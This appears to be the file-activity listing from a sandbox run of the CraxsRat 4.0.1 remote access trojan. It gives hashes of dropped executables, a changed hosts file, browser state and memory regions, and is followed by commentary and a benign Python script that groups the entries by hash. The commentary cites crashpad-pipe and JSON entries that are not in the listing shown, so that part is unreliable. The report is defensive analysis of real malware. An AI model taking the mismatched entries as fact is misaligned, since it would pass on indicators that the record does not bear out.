SHA256 4d4583771161ce52f9444008e02308924173d43ec6810ab6bf533ae3ea2c3f26
SHA512 79c1e58d879047f6932f622ed975e54f7800fba99263ac4987e5a45f3d8798cdf1204f9d792de7a432e6e5a7cbd4db4088a490ee47fd2b041e8355415627d37f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1c8da91907ffc5c7ee05a16c33da06af
SHA1 f60dc23d11b05be4ee4696e142e410dd902970ac
SHA256 a76f8e5714dc97c5b2c16142f6f6da212d86e1a910d75cf6385d70d4c516a319
SHA512 50f1933abeb0df18a4b5b26c0b314ff0274054cce6fc800cec50f97e62e0a0ab467b12d3a895bb103068d3139ff6543c5d6fa98dcebbcd98711de9f8a8239c52

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f1b37f254f92009f2aaaf9dfde60db1a
SHA1 834be803b63d7c431e2030ae1d8967ef2c9c2f9a
SHA256 fba4a3e94bc868623e9f27b324414c13f2cbe9d69030bc2082e0f0524194db3d
SHA512 cbe74ad7e5ed3d21c217509e9bc6656d4fee8c15d2a924eb9263e85a71c7e742ddd5ee612fdb819d9e93af2ca52c51598676ca3b7166f7c307cfdbbb542c0f72

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 e1e0505ed461d4e1c1f8ba79ad215381
SHA1 5acacf88a06a9c853f29e966dcc122aa591c100c
SHA256 5f65a0ebf8a853b12cb2ff65901b78269cb95fdbdc3f52d05365e30af64306c7
SHA512 b9c51992a21200b296c2e6c43cda153ecd8de61c41675c8e1f653da0e8e2df16ef4c2a5d976725bec24fad8bd29bfffcd9d757947fe6c4bd155803e7363ef3fa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 eeaface4d0adb3f46276381fea765c7d
SHA1 7fac5742b2569721b5ed5fcd196cb01ba73f4df4
SHA256 e5aea05406ee1cb6e5aa4c5cd670cd0e7e53dfb9c740e5175d21682aac89c740
SHA512 a7154d7dac25267479517aa2e7b21f77eade7d7969141ff1c0b331c9363c8f33d8347777c7947cebdb376144e9aa70193d2b6414339c24956ca67a4e92dc4fbf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1b1e4b1759b0cdc07439e0ee6f119db3
SHA1 ca588f35c50860ddfc0df0f54f93f73ce572e487
SHA256 b8dac8e477f7bd64e7b804ad16af1a547f24fb163359165d95e1258d126e9fc1
SHA512 d5a29c6470d4d772155fb86e9c1b56903d3d9548ac09c70054e464c5b84b6e48ec307e0417ed31bb1dbb52f239b751f33f196e66a754c80adcdd52a7117feb6c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 d0fe95c10254c82c0edc553671d056c2
SHA1 d37ccd4a2b5df4690cf07af82d61713c180c68a1
SHA256 e497b1ab7680172eb212189f739980a20b9684beb0d60b3e088f5206cd534100
SHA512 a53ac0bc27258b8e967423417480be3a893d19483fd8437be27e367a8b4f1210c086a6f3f61b2a2223328e7573d6f8e90cdd3aca4dc2fe24bbd68c36ca75e7f2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57540b.TMP

MD5 0c66da520936840091a9553b9544643f
SHA1 a7e675f2a479810ed60cdab49913eeff588468be
SHA256 bb916a27defc62f40754a29cfeb59c9073ac4f3b6e839b2ba71d80625d68b3f9
SHA512 1856085144009761efa5f2906c73e91a81cd9797dfefcd5ea90510b0265fb3796dd08acd430c3df49a98b88f8be5f07eed8aa011a68ad0a4ba25181ce6542f58

C:\Users\Admin\Downloads\Unconfirmed 494050.crdownload

MD5 8a3faa499854ea7ff1a7ea5dbfdfccfb
SHA1 e0c4e5f7e08207319637c963c439e60735939dec
SHA256 e5e9f54a55ad4b936adaed4cca5b4d29bd6f308f1a0136a7e3c0f5fb234e7fff
SHA512 4c7474353dd64e1a1568b93e17be3f2f0eaf24b7d520339c033f46a517b0e048e88bda1b5d5bcfe62353930d8d76a7037ec6200882df8afc310322a5d5fceb25

C:\Users\Admin\Downloads\winrar-x64-622.exe

MD5 8a3faa499854ea7ff1a7ea5dbfdfccfb
SHA1 e0c4e5f7e08207319637c963c439e60735939dec
SHA256 e5e9f54a55ad4b936adaed4cca5b4d29bd6f308f1a0136a7e3c0f5fb234e7fff
SHA512 4c7474353dd64e1a1568b93e17be3f2f0eaf24b7d520339c033f46a517b0e048e88bda1b5d5bcfe62353930d8d76a7037ec6200882df8afc310322a5d5fceb25

C:\Program Files\WinRAR\Uninstall.exe

MD5 36297a3a577f3dcc095c11e5d76ede24
SHA1 ace587f83fb852d3cc9509386d7682f11235b797
SHA256 f7070f4bb071cd497bf3067291657a9a23aab1ca9d0ab3f94721ef13139ce11b
SHA512 f7a3937f9ffb5ebaac95bddc4163436decdd6512f33675e3709227a1a7762588a071143140ed6bb2a143b006931e5c8b49486647800f0de2e5c355e480f57631

C:\Program Files\WinRAR\uninstall.exe

MD5 36297a3a577f3dcc095c11e5d76ede24
SHA1 ace587f83fb852d3cc9509386d7682f11235b797
SHA256 f7070f4bb071cd497bf3067291657a9a23aab1ca9d0ab3f94721ef13139ce11b
SHA512 f7a3937f9ffb5ebaac95bddc4163436decdd6512f33675e3709227a1a7762588a071143140ed6bb2a143b006931e5c8b49486647800f0de2e5c355e480f57631

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 7b500a0deb3ac0828009bfa9163e4ba1
SHA1 db68d78d2c26f1bb73e9cbf8a1f943cd71451977
SHA256 0458e10bb888f754970fd6da3fe11ad1dcf8f597c62bf9774a71d8cd60b372a2
SHA512 7cc56f7b1313b88d2befdf0ce6e194cd0804d9432b00b90d0380e05fbad6689cd6507a77d97babaec7f9fd5600bc9f648a6cc9c1910f6297e50cebeaa9766627

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 aa7f7359bf5f64b4053726c789d5494a
SHA1 d737378fc1553837d1d9883666f9fb3fbdc535d0
SHA256 deeb6a87b010ccd855fafde546c5341efc3bd3bdc3fa9596fafbbed7f76f2c1f
SHA512 92f9b442cc1227c67c0b74a76a174c3df2996efc76c014a92c3c8ab87958759f9ff6f9d9fa346c206fb26c3cbc7cce5f203aef636b9d08108aee51ce5b689af0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 70f6a3d89f8a4c920664e6f0993d8711
SHA1 2acf5a79177bc54c767a5e842e4e5026a853b0a5
SHA256 47a1ed49f9699211f60d042788a68d7e695dc5e9557125de887bbf577b0f6620
SHA512 06db6d8171734144a491da5da986cedd6b2bfc99fabc17ba031fae0d6a7f6b584f7ddbb90fd9a533c98d5c897ac4c16bef960ad8b1a60c3b0f7b9737dba12c85

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 b518a4713e4ff98c9d23513633806d7d
SHA1 e9c87ad06551ba5f113dc0b5894898cb2a09ed77
SHA256 795983c42333e052f8f96e10af965ee581b25d2706e92879e793c79b48ba71ec
SHA512 e8e51b94453804c5897266403c8d293e37a08937bbf9e13c740d39ec942f76cacb99d82ed25e896f618156ce763316b3070a4917b22a992e77249443482a415f

C:\Program Files\WinRAR\WinRAR.exe

MD5 04fbad3541e29251a425003b772726e1
SHA1 f6916b7b7a42d1de8ef5fa16e16409e6d55ace97
SHA256 0244b889e1928a51b8552ab394f28b6419c00542a1bbc2366e661526790ec0a7
SHA512 3e85cf46dd5a7cadc300488e6dadea7f271404fb571e46f07698b3e4eaac6225f52823371d33d41b6bbd7e6668cd60f29a13e6c94b9e9cb7e66090af6383d8b2

C:\Program Files\WinRAR\Rar.txt

MD5 18eeb70635ccbe518da5598ff203db53
SHA1 f0be58b64f84eac86b5e05685e55ebaef380b538
SHA256 27b85e1a4ff7df5235d05b41f9d60d054516b16779803d8649a86a1e815b105b
SHA512 0b2a295b069722d75a15369b15bb88f13fbda56269d2db92c612b19578fc8dadf4f142ebb7ee94a83f87b2ddd6b715972df88b6bb0281853d40b1ce61957d3bd

C:\Program Files\WinRAR\WinRAR.chm

MD5 11d4425b6fc8eb1a37066220cac1887a
SHA1 7d1ee2a5594073f906d49b61431267d29d41300e
SHA256 326d091a39ced3317d9665ed647686462203b42f23b787a3ed4b4ad3e028cc1e
SHA512 236f7b514560d01656ffdee317d39e58a29f260acfd62f6b6659e7e2f2fca2ac8e6becac5067bab5a6ceaeaece6f942633548baeae26655d04ac3143a752be98

C:\Program Files\WinRAR\WhatsNew.txt

MD5 eaeee5f6ee0a3f0fe6f471a75aca13b8
SHA1 58cd77ef76371e349e4bf9891d98120074bd850c
SHA256 f723976575d08f1001b564532b0a849888135059e7c9343c453eead387d7ae4c
SHA512 3fc5994eefce000722679cf03b3e8f6d4a5e5ebfd9d0cc8f362e98b929d1c71e35313a183bfe3ab5adbd9ce52188ade167b8695a58ebd6476189b41627512604

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 1c606acbee97ce6eba267c191a2b39fb
SHA1 085d3a6e3fd0e09e23e48db64e17527872c84c25
SHA256 94dc4c918af6432468d34683f7227b334a6dff3913b75140a9a8c856efe7a588
SHA512 afea44d9ff01dd4c6a641d9bc09230fa56027dcb22c89817c99514f663b041e4a11d20a3bb89a9ee34d50f3f5f2a264dcd775235d345a1eb22e4bb9e673648cf

C:\Program Files\WinRAR\RarExt.dll

MD5 608f972a89e2d43b4c55e4e72483cfd5
SHA1 1b58762a3ae9ba9647d879819d1364e787cb3730
SHA256 dd989631b1b4f5450766ad42aec9a0e16718a0d23bc694fa238a4d54b02be417
SHA512 3c410d19aaa780e4fe25b331f85bdd8ccd0a9f585d538afdf216dfcd5c3a6ee911924bcca9078af689c4610f23a31e5a89c7c84144356e8dedceac7fb020960a

C:\Users\Admin\Downloads\CraxsRat_4.0.1.zip

MD5 8a50e7c45a5e3f997cc5977877905cd4
SHA1 69322ab4e93846603acdf50d778721766ec76515
SHA256 330be9927418eca24b6b0acadec70a2ebcdccfd9b3a7588ef4e707bf85c76502
SHA512 360f6b1aac4648a45b653fb7bd1a91007093ae535e855c043b301240e47cf19f4d78442f080b869a52c62bc3386068afb77b42b8a98349eab780eb39b45d6b14

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 f283eba8092b16cfbcfaa20e536d7ea0
SHA1 a7945d8de0bc5628a8f498365150959c24521d56
SHA256 cd4b21656681db95778cbe8e144d75ebecde08b471eae09d5841ad10937329b8
SHA512 9334a1c674b22153de7d12dcfaebbfa08a5fee55b3bddb54feed4b9d672ea24e6a06604fac148cabc39ffa7fdb81c21fc50b87072b872c9693fdd69a03d51238

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 6c5d0785d213b5c91fcffe10c171a5a0
SHA1 bcc22eeb8b2bf7346c6179b7c5f015bd094d4ef8
SHA256 0737f39034bd7e8c4f3a03e3286a67f3885e5a10556d4bff3ddaffe07e54ed2d
SHA512 b234cf42401cd849a1df5de55ce9eeacfc745e8ed8df45939962620ec3e91d6034e424ef1c81321149d9757d052333b0e184c95a6ca5c610aaff9baaf2453ac9

C:\Users\Admin\Downloads\CraxsRat_4.0.1\CraxsRat 4.0.1\CraxsRat 4.0.1.exe

MD5 81c22352dd68afc80e3da83547b65ca9
SHA1 815d2402b2a723b56f82690ed5af01717fcad751
SHA256 4cf6e11851bf2ee98c45d826134413a674e7b5740ca95c38450db77750fdb8a8
SHA512 e3c3c2ea2282c0f0d31f6a889b36651e9e522b0c1d8730f4149a765e053a2e8e6761068581358062db17289ad1245d6db397816e7afe63b934152e79dac76ecc

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

MD5 f873bee92e6118ff16b63b2a75173818
SHA1 4061cab004813a12e8042b83228885dfbc88547f
SHA256 7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d
SHA512 368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

C:\Users\Admin\AppData\Local\Temp\BLACKK.exe

MD5 15b7bffd31462f0ca361a1c2b2211f86
SHA1 bdf831203ded29b82e4aa989f26fea441b6a20ba
SHA256 1ef388812d9c21af5a0a508d5a37561deba51dcbebe9f8a5a9a7397300865580
SHA512 c48fd5855527f2e2615b3614ad43c025fac85ef1538de2a52a6267e3e61be611b04854bbcad54111c56f3ce661159b94d1639414cb0ce0086f466163ed0d3153

memory/2704-1524-0x0000000000400000-0x000000000079B000-memory.dmp

memory/952-1526-0x00000000008B0000-0x00000000008C8000-memory.dmp

memory/2372-1527-0x0000000000720000-0x0000000000A90000-memory.dmp

memory/2372-1528-0x0000000005520000-0x00000000055BC000-memory.dmp

memory/2372-1530-0x0000000005B70000-0x0000000006114000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ml042oli.xay.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4960-1536-0x000001C5F02B0000-0x000001C5F02D2000-memory.dmp

memory/4960-1542-0x000001C5F0270000-0x000001C5F0280000-memory.dmp

memory/4960-1543-0x000001C5F0270000-0x000001C5F0280000-memory.dmp

memory/4960-1544-0x000001C5F0270000-0x000001C5F0280000-memory.dmp

memory/4556-1548-0x0000000000400000-0x0000000000484000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CraxsRat 4.0.1.exe.log

MD5 99e770c0d4043aa84ef3d3cbc7723c25
SHA1 19829c5c413fccba750a3357f938dfa94486acad
SHA256 33c7dd4c852dae6462c701337f8e0a8647602847ccaee656fa6f1149cccfb5d5
SHA512 ba521e2f57d7e1db19445201948caa7af6d953e1c1340228934888f8ec05b8984ad492122d0bf0550b5e679614d8a713ecf68f91916ffa6e5d8f75bf003aae39

memory/4556-1552-0x0000000005670000-0x0000000005702000-memory.dmp

memory/4556-1553-0x0000000005520000-0x000000000552A000-memory.dmp

memory/4960-1554-0x000001C5F0270000-0x000001C5F0280000-memory.dmp

memory/4556-1555-0x00000000058E0000-0x00000000058F0000-memory.dmp

memory/4556-1556-0x0000000005770000-0x00000000057C6000-memory.dmp

memory/4556-1559-0x0000000008D10000-0x0000000008D76000-memory.dmp

memory/3688-1562-0x0000000000400000-0x000000000041B000-memory.dmp

memory/3688-1564-0x0000000000400000-0x000000000041B000-memory.dmp

memory/3688-1566-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4556-1567-0x00000000058E0000-0x00000000058F0000-memory.dmp

memory/4960-1569-0x000001C5F0270000-0x000001C5F0280000-memory.dmp

memory/4960-1568-0x000001C5F0270000-0x000001C5F0280000-memory.dmp

memory/4960-1570-0x000001C5F0270000-0x000001C5F0280000-memory.dmp

memory/4960-1571-0x000001C5F0270000-0x000001C5F0280000-memory.dmp

memory/4556-1572-0x00000000058E0000-0x00000000058F0000-memory.dmp

memory/4084-1573-0x0000000000400000-0x0000000000458000-memory.dmp

memory/4084-1575-0x0000000000400000-0x0000000000458000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data

MD5 3a5ee15f1b5aaf04c8ecc0b5c59bfc8b
SHA1 fdb221c701a53b0dd300d9ec4bd8441a1d685092
SHA256 23cd0bd4b981f00c984888a3e59cdf6379ae973fc7682b54ffca6964b1509756
SHA512 5d1d09ca798c71b0cc84527391c64946408686b21d03543ce15ce185df859af1c3b26c2e2fc3e71de655a6a6ddd1045606792064149f61d67309e0200d5832f3

memory/4556-1586-0x00000000058E0000-0x00000000058F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\holderwb.txt

MD5 f94dc819ca773f1e3cb27abbc9e7fa27
SHA1 9a7700efadc5ea09ab288544ef1e3cd876255086
SHA256 a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92
SHA512 72a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196

memory/4084-1590-0x0000000000460000-0x0000000000529000-memory.dmp

memory/4084-1589-0x0000000000400000-0x0000000000458000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg0.exe

MD5 d1529aa798dfc7fe269926f5594b467b
SHA1 99f46134e97b9f7468ad7ab7c3a79cc3b8260664
SHA256 958a77c3267fb67c8dc97fc0045308fb492a04a32dd9de7178de813a78ac3cc3
SHA512 5d06d227a4652b4206dfa5f8cae3bc8b220de135cd715f960b89fb81e8c66b71ad7196f72e16139d5734f4e0ba827c31faeaa091376daf29b28a2ce34b8ecb41

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg1.exe

MD5 5f2f1ae240812065799e8c05d3a01aa7
SHA1 e14d1c6a64f27267c688b695da84b7a9527a3d13
SHA256 adad69d9a6bf24c7739cc25cf4def1b96d05accc349ed86e9200d404c039ad03
SHA512 d92339a954509b988b6eb3b7508182a7773489aa27ed88ddaf6c5f3a3f26f345c8463bf688b40cc99b9728bc47c1b4e1ad8175a9e07fe576a216c9521cb07f50

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg2.exe

MD5 17d1a593f7481f4a8cf29fb322d6f472
SHA1 a24d8e44650268f53ca57451fe564c92c0f2af35
SHA256 f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c
SHA512 8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f58e73a5c43b0713d39bb6cca4251670
SHA1 ece141754053a0d3855b7270a9569601e99dbbf6
SHA256 f374315ca436a4f0505cdc56d043e1176df91064603a38001902cf596262d015
SHA512 1872b460e63288eabd785e10c76ee0b35bb9c37891193ad4ac0992e37f2fd6d9e692cea26ceec58b219b892910825e80d8e009c161d36735eb1dd839d4622ee8

memory/748-1632-0x0000023B27920000-0x0000023B27930000-memory.dmp

memory/748-1634-0x0000023B27920000-0x0000023B27930000-memory.dmp

memory/748-1633-0x0000023B27920000-0x0000023B27930000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 23fe306d33dea7acaf8d7adb3ebcf88c
SHA1 048a537ecf8d7949c5112950eccb4ff0941d00f3
SHA256 0fd245bfb504d1d1960d46680cc6aa01597747ff6c9bb37cc2b0101bc36f5f5c
SHA512 f7ce42890a53cfa1266966e97c2f31ab272a23cfec2b5750757887dda38b7ad224c27949f3bc2d6be7d5a6400f4391a908c2e1aea6c8db193f89f7764f87c7b1

memory/392-1639-0x00007FFD80C90000-0x00007FFD80E85000-memory.dmp

memory/392-1640-0x00007FFD80B20000-0x00007FFD80BDE000-memory.dmp

memory/580-1641-0x0000023B06220000-0x0000023B06241000-memory.dmp

memory/580-1642-0x0000023B06250000-0x0000023B06277000-memory.dmp

memory/580-1644-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/656-1645-0x000001F4BC9C0000-0x000001F4BC9E7000-memory.dmp

memory/656-1649-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/2900-1647-0x00007FF74CD50000-0x00007FF74D31C000-memory.dmp

memory/932-1652-0x000001CCEE2D0000-0x000001CCEE2F7000-memory.dmp

memory/1012-1653-0x0000025AABEA0000-0x0000025AABEC7000-memory.dmp

memory/1012-1657-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/848-1661-0x000001361F600000-0x000001361F627000-memory.dmp

memory/932-1655-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/848-1663-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/580-1669-0x0000023B06250000-0x0000023B06277000-memory.dmp

memory/392-1654-0x00007FF60F100000-0x00007FF60F129000-memory.dmp

memory/1764-1675-0x00000195CB0F0000-0x00000195CB100000-memory.dmp

memory/656-1676-0x000001F4BC9C0000-0x000001F4BC9E7000-memory.dmp

memory/932-1677-0x000001CCEE2D0000-0x000001CCEE2F7000-memory.dmp

memory/1012-1680-0x0000025AABEA0000-0x0000025AABEC7000-memory.dmp

memory/1044-1684-0x000001D869690000-0x000001D8696B7000-memory.dmp

memory/1036-1683-0x0000021A0ED00000-0x0000021A0ED27000-memory.dmp

memory/848-1682-0x000001361F600000-0x000001361F627000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9c97a801bb5d6c21c265ab7f283ba83e
SHA1 7c0a4cb73d63702a2d454268d983e0dcb36a8bf8
SHA256 69d9676a8c93686c904d9ce6193221476d6c72bc4d3250a232c03ccbeae380c7
SHA512 d3abd8bfccd3a3fec55c13e85e755fbd589e6ea04321169c7c8cf5badf7b6ffe96c0c2ed449a0b4a99ecfd1e7bb7edc3311d335c8956cf344c9584fb0bda50d9

memory/1036-1685-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/1044-1687-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/1144-1686-0x000001BBF2510000-0x000001BBF2537000-memory.dmp

memory/1144-1690-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/1196-1694-0x000001F86A340000-0x000001F86A367000-memory.dmp

memory/1196-1695-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/1208-1699-0x0000023351730000-0x0000023351757000-memory.dmp

memory/1208-1701-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/1224-1702-0x000001C372180000-0x000001C3721A7000-memory.dmp

memory/1224-1705-0x00007FFD40D10000-0x00007FFD40D20000-memory.dmp

memory/1352-1707-0x000001A81E460000-0x000001A81E487000-memory.dmp

memory/1036-1724-0x0000021A0ED00000-0x0000021A0ED27000-memory.dmp

memory/1144-1730-0x000001BBF2510000-0x000001BBF2537000-memory.dmp

memory/1764-1732-0x00000195CB0F0000-0x00000195CB100000-memory.dmp

memory/1044-1728-0x000001D869690000-0x000001D8696B7000-memory.dmp

memory/1196-1733-0x000001F86A340000-0x000001F86A367000-memory.dmp

memory/1208-1734-0x0000023351730000-0x0000023351757000-memory.dmp

memory/1224-1735-0x000001C372180000-0x000001C3721A7000-memory.dmp

memory/1352-1736-0x000001A81E460000-0x000001A81E487000-memory.dmp

memory/1400-1737-0x00000206BEEA0000-0x00000206BEEC7000-memory.dmp

memory/1408-1739-0x00000257CB070000-0x00000257CB097000-memory.dmp

memory/1492-1741-0x000002B064BB0000-0x000002B064BD7000-memory.dmp

memory/1520-1744-0x00000190793C0000-0x00000190793E7000-memory.dmp

memory/1588-1747-0x000001D0A3D70000-0x000001D0A3D97000-memory.dmp

memory/1620-1751-0x0000025A1FC90000-0x0000025A1FCB7000-memory.dmp

memory/1776-1756-0x000001E0E5CE0000-0x000001E0E5D07000-memory.dmp
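The Files list mixes Chrome profile churn, the WinRAR installer the sandbox user fetched, the sample itself and the executables it dropped. It reads best by content hash rather than by path: the .crdownload and winrar-x64-622.exe entries are the same bytes under two names, while the two files called CraxsRat 4.0.1.exe (the one extracted to Downloads and the one written to Temp) carry different hashes and are therefore different binaries, and the crashpad pipe and persisted_first_party_sets.json entries are the well-known digests of an empty input and of the two-byte JSON text {}. The script below is an added example, not the report's own tooling: it parses entries in this section's layout (a subset copied into SAMPLE_FILES), groups them by SHA-256, and labels the two known-content digests by computing them with hashlib rather than hard-coding them.

```python
"""Group a sandbox file listing by content hash.  Added example, not the
report's own tooling; SAMPLE_FILES is a subset copied from the Files
section above (SHA-1/SHA-512 lines dropped for brevity)."""
import hashlib
from collections import defaultdict
from typing import Dict, List, Optional

SAMPLE_FILES = r"""
\??\pipe\crashpad_3592_ACDOVCADOLTQUWVP

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

C:\Users\Admin\Downloads\Unconfirmed 494050.crdownload

SHA256 e5e9f54a55ad4b936adaed4cca5b4d29bd6f308f1a0136a7e3c0f5fb234e7fff

C:\Users\Admin\Downloads\winrar-x64-622.exe

SHA256 e5e9f54a55ad4b936adaed4cca5b4d29bd6f308f1a0136a7e3c0f5fb234e7fff

C:\Users\Admin\Downloads\CraxsRat_4.0.1\CraxsRat 4.0.1\CraxsRat 4.0.1.exe

SHA256 4cf6e11851bf2ee98c45d826134413a674e7b5740ca95c38450db77750fdb8a8

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

SHA256 7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d

C:\Users\Admin\AppData\Local\Temp\BLACKK.exe

SHA256 1ef388812d9c21af5a0a508d5a37561deba51dcbebe9f8a5a9a7397300865580

memory/2704-1524-0x0000000000400000-0x000000000079B000-memory.dmp
"""

HASH_ALGOS = ("MD5", "SHA1", "SHA256", "SHA512")

# Digests whose content is known outright, computed rather than hard-coded.
KNOWN_CONTENT = {
    hashlib.sha256(b"").hexdigest(): "empty file",
    hashlib.sha256(b"{}").hexdigest(): "empty JSON object",
}


def parse_files(listing: str) -> List[Dict[str, Optional[str]]]:
    """One entry per path line; hash lines attach to the entry above them,
    so memory-dump lines simply end up with no hashes."""
    entries: List[Dict[str, Optional[str]]] = []
    for line in listing.splitlines():
        line = line.strip()
        if not line:
            continue
        algo, _, digest = line.partition(" ")
        if algo in HASH_ALGOS and entries:
            entries[-1][algo.lower()] = digest.lower()
        else:
            entries.append({"path": line})
    return entries


def by_hash(entries: List[Dict[str, Optional[str]]]) -> Dict[str, List[str]]:
    """SHA-256 -> sorted paths written with that content."""
    groups = defaultdict(set)
    for e in entries:
        if e.get("sha256"):
            groups[e["sha256"]].add(e["path"])
    return {h: sorted(p) for h, p in groups.items()}


def aliases(entries: List[Dict[str, Optional[str]]]) -> Dict[str, List[str]]:
    """Same bytes under more than one path (e.g. a .crdownload that was renamed)."""
    return {h: p for h, p in by_hash(entries).items() if len(p) > 1}


def name_collisions(entries: List[Dict[str, Optional[str]]]) -> Dict[str, List[str]]:
    """Same file name written with different contents: an overwrite or a look-alike."""
    seen = defaultdict(set)
    for e in entries:
        if e.get("sha256"):
            seen[e["path"].rsplit("\\", 1)[-1]].add(e["sha256"])
    return {name: sorted(h) for name, h in seen.items() if len(h) > 1}


def known_content(sha256: str) -> Optional[str]:
    return KNOWN_CONTENT.get(sha256.lower())


if __name__ == "__main__":
    entries = parse_files(SAMPLE_FILES)
    for h, paths in aliases(entries).items():
        print("same content:", h[:12], paths)
    for name, hashes in name_collisions(entries).items():
        print("same name, different bytes:", name, [h[:12] for h in hashes])
    for e in entries:
        if e.get("sha256") and known_content(e["sha256"]):
            print(known_content(e["sha256"]), "->", e["path"])
```

Once the listing is keyed by hash, the numbers worth pivoting on are the few that are neither Chrome state nor WinRAR: here the two CraxsRat 4.0.1.exe digests, BLACKK.exe, and the qrjhwnek.reg*.exe drops further up the list.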